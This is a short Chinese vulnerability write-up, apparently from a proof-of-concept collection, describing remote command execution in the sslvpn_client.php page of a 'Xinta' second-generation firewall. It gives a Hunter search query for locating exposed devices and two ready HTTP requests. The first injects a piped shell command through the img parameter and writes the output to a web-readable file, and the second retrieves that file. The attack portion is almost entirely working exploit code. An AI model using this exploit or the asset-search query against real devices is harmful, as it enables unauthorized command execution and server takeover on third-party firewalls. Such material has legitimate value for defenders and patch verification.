鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞¶
一、漏洞简介¶
鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。
二、影响版本¶
- 博达下一代防火墙
三、资产测绘¶
- hunter
web.body="欢迎登录鑫塔第二代防火墙" - 特征
四、漏洞复现¶
GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
获取命令执行结果
GET /sslvpn/ceshi.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
更新: 2024-02-29 23:57:12
原文: https://www.yuque.com/xiaokp7/ocvun2/du84v1279q9b4hgp